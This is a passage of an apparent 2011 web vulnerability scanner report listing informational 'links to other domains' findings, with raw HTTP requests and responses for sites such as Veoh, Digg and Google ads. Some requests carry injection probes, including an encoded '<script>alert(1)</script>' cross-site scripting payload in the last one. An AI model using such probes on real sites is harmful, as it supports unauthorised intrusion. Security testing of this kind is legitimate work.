Location: http://veoh-221.vo.llnwd.net/Vpreviews/p/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll?e=1296772156&ri=4500&rs=75&h=a49aee73de62d5e091de2c78ad6237c2
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=411

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-221.vo.llnwd.net/Vpreviews/p/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll?e=1296772156&amp;ri=4500&amp;rs=75&amp;h=a49aee73de62d5e091de2c78ad6237c2">here</a>
...[SNIP]...

18.43. http://content.veoh.com/flash/p/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll?ct=88aba0740e07d5f7f56fd6f5ee4baf89636eb1f3434ccf3a HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:04:36 GMT
Connection: close
Location: http://veoh-066.vo.llnwd.net/Vpreviews/p/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll?e=1296772176&ri=4500&rs=75&h=8ccd7a1b6cab903fdf264b4d846a49fd
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=493

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-066.vo.llnwd.net/Vpreviews/p/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.fll?e=1296772176&amp;ri=4500&amp;rs=75&amp;h=8ccd7a1b6cab903fdf264b4d846a49fd">here</a>
...[SNIP]...

18.44. http://content.veoh.com/flash/p/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll?ct=ee1ac1e1b969efe90ce46a34622691166a282a28a447fea7 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:04:33 GMT
Connection: close
Location: http://veoh-026.vo.llnwd.net/Vpreviews/t/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll?e=1296772173&ri=4500&rs=75&h=964f50b4aec514317186e19f819574a9
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=465

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-026.vo.llnwd.net/Vpreviews/t/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.fll?e=1296772173&amp;ri=4500&amp;rs=75&amp;h=964f50b4aec514317186e19f819574a9">here</a>
...[SNIP]...

18.45. http://content.veoh.com/flash/p/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll?ct=829e84c786fd32541cc6ed1d2f01c2f21f90293fcbb62899 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:04:48 GMT
Connection: close
Location: http://veoh-097.vo.llnwd.net/Vpreviews/t/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll?e=1296772188&ri=4500&rs=75&h=18adf08ab713795302a2462e38d940f6
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=390

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-097.vo.llnwd.net/Vpreviews/t/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.fll?e=1296772188&amp;ri=4500&amp;rs=75&amp;h=18adf08ab713795302a2462e38d940f6">here</a>
...[SNIP]...

18.46. http://content.veoh.com/flash/p/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll?ct=a8bba23b03785e9415b4e3f25f1f1fb4847a350135158ed8 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:04:46 GMT
Connection: close
Location: http://veoh-173.vo.llnwd.net/Vpreviews/t/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll?e=1296772186&ri=4500&rs=75&h=80994c13cbde784a2e11708b2624acb0
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=468

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-173.vo.llnwd.net/Vpreviews/t/ad81f90905f646d0bfcee2e2da7fec53051d2878.fll?e=1296772186&amp;ri=4500&amp;rs=75&amp;h=80994c13cbde784a2e11708b2624acb0">here</a>
...[SNIP]...

18.47. http://content.veoh.com/flash/p/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll?ct=438c923dd9f05e5e8bb21aa2fd19b0bcaf20364cdf76c33d HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:04:32 GMT
Connection: close
Location: http://veoh-199.vo.llnwd.net/Vpreviews/t/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll?e=1296772172&ri=4500&rs=75&h=33ad4a22ab3a42830cc5c037a7a56251
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=495

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-199.vo.llnwd.net/Vpreviews/t/c7785f65451cc117cf0b3869508e3cfb3245dc5d.fll?e=1296772172&amp;ri=4500&amp;rs=75&amp;h=33ad4a22ab3a42830cc5c037a7a56251">here</a>
...[SNIP]...

18.48. http://core.videoegg.com/eap/12368/html/jstags.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /eap/12368/html/jstags.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /eap/12368/html/jstags.html?CCID=0&r=0.3821160274092108 HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/videoegg/ad.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-2047109742-1295039241849

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "eae304da32ffc83f8aac123834882aa2:1292880706"
Last-Modified: Mon, 20 Dec 2010 21:16:26 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 20:51:19 GMT
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public
Content-Length: 1060

<html>
<body>
<script>
var vars = {};
var v = document.location.search.substring(1).split("&");
for (var i = 0; i < v.length; i++)
{
var kv = v[i].split("=");
vars[kv[0
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.49. http://delicious.com/save  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delicious.com
Path:   /save

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /save?v=5&noui&jump=close&url=http://ir.supermedia.com/index.cfm?&title=SuperMedia - Investor Relations HTTP/1.1
Host: delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Date: Thu, 03 Feb 2011 19:35:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.19.4

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 400 Bad Request</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial
...[SNIP]...
<div id="ygma"><a href="http://us.rd.yahoo.com/400/*http://www.yahoo.com"><img
src=http://l.yimg.com/a/i/yahoo.gif
width=147 height=31 border=0 alt="Yahoo!">
</a><div><a
href="http://us.rd.yahoo.com/400/*http://www.yahoo.com">
Yahoo!</a>
- <a href="http://us.rd.yahoo.com/400/*http://help.yahoo.com">Help</a>
...[SNIP]...
<strong><a
href="http://us.rd.yahoo.com/400/*http://www.yahoo.com">
Yahoo! home
page</a>
...[SNIP]...
<strong><a
href="http://us.rd.yahoo.com/400/*http://docs.yahoo.com/docs/family/more/">
Yahoo!'s
online services</a>
...[SNIP]...
<span><a href="http://us.rd.yahoo.com/400/*http://search.yahoo.com/search/options?p=">advanced search</a>
...[SNIP]...
</span> <a href="http://us.rd.yahoo.com/400/*http://buzz.yahoo.com">most popular</a>
...[SNIP]...
<strong><a
href="http://us.rd.yahoo.com/400/*http://help.yahoo.com">
Yahoo!
Help Central</a>
...[SNIP]...
<p>Copyright &copy; 2011 Yahoo! Inc.
All rights reserved. <a
href="http://us.rd.yahoo.com/400/*http://privacy.yahoo.com">
Privacy
Policy</a> - <a
href="http://us.rd.yahoo.com/400/*http://docs.yahoo.com/info/terms/">
Terms
of Service</a>
...[SNIP]...

18.50. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /submit?phase=2&url=http://ir.supermedia.com/index.cfm? HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:35:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1168415921484595456%3A180; expires=Fri, 04-Feb-2011 19:35:44 GMT; path=/; domain=digg.com
Set-Cookie: d=9a81d04bc71053ddb307d64c049af82a3be90be8ba862b2a52714e2e4b2b499b; expires=Wed, 03-Feb-2021 05:43:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=33479 10.2.129.81
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7667

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<meta name="description" content="The best news, videos and pictures on the web as voted on by the Digg community. Breaking news on Technology, Politics, Entertainment, and more!">

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">


<link rel="stylesheet" type="text/css" href="http://cdn3.diggstatic.com/css/library/global.16354f29.css" media="all">
<!--[if IE 7]>
...[SNIP]...
<![endif]-->

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/App_Submission/index.c3c738bb.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
<li><a href="http://www.surveymonkey.com/s/ZNBQMYJ" id="feedback-bar-survey">Take the survey</a>
...[SNIP]...
</div>
<script src="http://cdn3.diggstatic.com/js/lib.56731306.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6299437&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

18.51. http://digg.com/submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /submit?url=http%3A%2F%2Fwww.veoh.com%2Fbrowse%2Fvideos%2Fcategory%2Faction_adventure%2Fwatch%2Fv18978294NGnK88j8&title=Magadheera+SmartDesis.TK.mp4&bodytext=action&media=video&topic=movies HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:06:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Fri, 04-Feb-2011 22:06:01 GMT; path=/; domain=digg.com
Set-Cookie: d=54e4a28f852dd9430bb81e5749041f841a02a7d84540fb9d52a4a7781b876e52; expires=Wed, 03-Feb-2021 08:13:41 GMT; path=/; domain=.digg.com
X-Digg-Time: D=28261 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3360

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg Mobile
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, p
...[SNIP]...
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">
<link rel="apple-touch-icon" href="http://cdn1.diggstatic.com/img/iphone/icon.63e34426.png"/>

<link rel="shortcut icon" href="http://cdn1.diggstatic.com/img/favicon.a015f25c.ico">

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/m/library/global.89871d10.css" media="all">

<link rel="stylesheet" type="text/css" href="http://cdn2.diggstatic.com/css/App_Submission/index.c3c738bb.css" media="all">

<script type='text/javascript'>
...[SNIP]...
</div>


<script src="http://cdn1.diggstatic.com/js/m/lib.b2eeaa6c.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

18.52. http://forums.digitalpoint.com/showthread.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.digitalpoint.com
Path:   /showthread.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1
Host: forums.digitalpoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:20 GMT
Server: Apache
Set-Cookie: bb_lastvisit=1296765140; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: bb_lastactivity=0; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: dyk=1; expires=Thu, 10-Feb-2011 20:32:20 GMT; path=/; domain=.digitalpoint.com
Cache-Control: private
Pragma: private
Content-Length: 24249
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<meta property="og:image" content="http://i.dpstatic.com/misc/dps_logo2.png" />


<script type="text/javascript" src="http://yui.yahooapis.com/2.8.2/build/yuiloader-dom-event/yuiloader-dom-event.js?v=411"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.2/build/connection/connection-min.js?v=411"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.dpstatic.com/s/vbulletin-core.js?v=411"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type="text/javascript" src="http://s.dpstatic.com/s/digitalpoint.js?v=411e"></script>


<link rel="alternate" type="application/rss+xml" title="Digital Point Forums RSS Feed" href="http://forums.digitalpoint.com/external.php?type=RSS2" />


<link rel="stylesheet" type="text/css" href="http://c.dpstatic.com/css.php?styleid=1&amp;langid=1&amp;d=1296611226&amp;td=ltr&amp;sheet=bbcode.css,editor.css,popupmenu.css,reset-fonts.css,vbulletin.css,vbulletin-chrome.css,vbulletin-formcontrols.css,dp.css" />

<!--[if lt IE 8]>
...[SNIP]...
</title>

<script type="text/javascript" src="http://s.dpstatic.com/s/vbulletin_md5.js?v=411"></script>
...[SNIP]...
<a name="top" href="./?s=60ff27681771626f1d2c139114155359" class="logo-image"><img src="http://i.dpstatic.com/misc/dps_logo.png" alt="Webmaster Forum - Internet Marketing & Search Engine Forums" /></a>
...[SNIP]...
<li>
<script type="text/javascript" src="http://s.dpstatic.com/s/vbulletin_md5.js?v=411"></script>
...[SNIP]...
<a id="fb_loginbtn" href="#"><img src="http://m.dpstatic.com/misc/facebook.gif" alt="The Facebook Platform" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<div class="social_buttons"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://forums.digitalpoint.com/showthread.php?t=" data-count="horizontal" data-related="digitalpoint">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="?s=60ff27681771626f1d2c139114155359" accesskey="1"><img src="http://m.dpstatic.com/misc/navbit-home.png" alt="Home" /></a>
...[SNIP]...
<div class="blockrow restore">No Thread specified. If you followed a valid link, please notify the <a href="http://www.twitter.com/digitalpoint?s=60ff27681771626f1d2c139114155359">administrator</a>
...[SNIP]...
</h1>
<img class="advertising" src="http://m.dpstatic.com/misc/bannersample.png">
Advertise virtually anything for relatively cheap with our full featured ad delivery system.
<br />
...[SNIP]...
<li><a href="http://www.twitter.com/digitalpoint?s=60ff27681771626f1d2c139114155359" target="_blank" rel="nofollow" accesskey="9">Contact Us @Twitter</a>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s.dpstatic.com/s/vbulletin_facebook.js?v=411"></script>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

18.53. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=2791779905&w=728&lmt=1296808485&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22&dt=1296786885787&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529%2C2067036752&correlator=1296786883899&frm=0&adk=1244530545&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=132698905&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=3&dtd=3&xpc=3xEmGmico9&p=http%3A//www.bizfind.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:33:52 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4261

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3Dwww.Groupon.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGGt1zSvzsK_rP6hg5TXtLrxVH-hw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.54. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1151291606842001&format=336x280_as&output=html&h=280&w=336&lmt=1296792058&channel=2580485469%2B6676530356%2B7430941303%2B7423008677%2B3389984008%2B2770489863%2B5766974533%2B0079161462&ad_type=text&color_bg=FFFFFF&color_border=FFFFFF&color_link=0085A0&color_text=777777&color_url=0085A0&flash=10.1.103&hints=reviews59ab9titlescriptalert1script4e54375ce26x22%20review%20reviews&url=http%3A%2F%2Fwww.buzzillions.com%2Freviews%2F59ab9%253C%2Ftitle%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E4e54375ce26%2Fx22&dt=1296770457996&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296770458025&frm=0&adk=16166161&ga_vid=2100204031.1296770458&ga_sid=1296770458&ga_hid=2006706455&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&ref=http%3A%2F%2Fburp%2Fshow%2F17&fu=0&ifi=1&dtd=101&xpc=ImbB79zpHm&p=http%3A//www.buzzillions.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
